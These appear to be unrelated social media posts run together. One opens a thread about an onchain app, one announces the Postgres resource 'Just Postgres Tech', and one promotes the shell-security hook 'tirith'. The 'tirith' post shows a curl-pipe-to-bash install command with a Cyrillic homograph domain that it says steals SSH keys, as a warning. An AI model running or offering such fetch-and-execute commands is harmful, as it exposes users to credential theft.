1/ Most onchain activity is invisible. You transact across chains and have nothing to show for it except transaction hashes in a block explorer.
Hoppin changes that. Here's what we built.
Be honest. When was the last time you actually read a command before pasting it into your terminal?
Because these two lines look identical:
curl -sSL https://install.example-cli | bash
curl -sSL https://іnstall.example-clі | bash
One installs your tool. The other steals your SSH keys.
That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink.
Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything.
So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry.
https://t.co/tIb4xThUn5
While working on the book, I had many ideas and received many suggestions on how to show more and dig deeper. But I had to stay focused on the book’s objective and keep only the topics that were truly necessary.
Those ideas and suggestions won’t vanish, though. I’ll start working on them slowly and publish them on the new "Just Postgres Tech" resource, which was launched tonight.
There isn’t much content there yet, but this resource is here to stay. I’ll keep developing and expanding it over time, whenever I have something worthwhile to share.
Go here: https://t.co/HTkQRlcH8c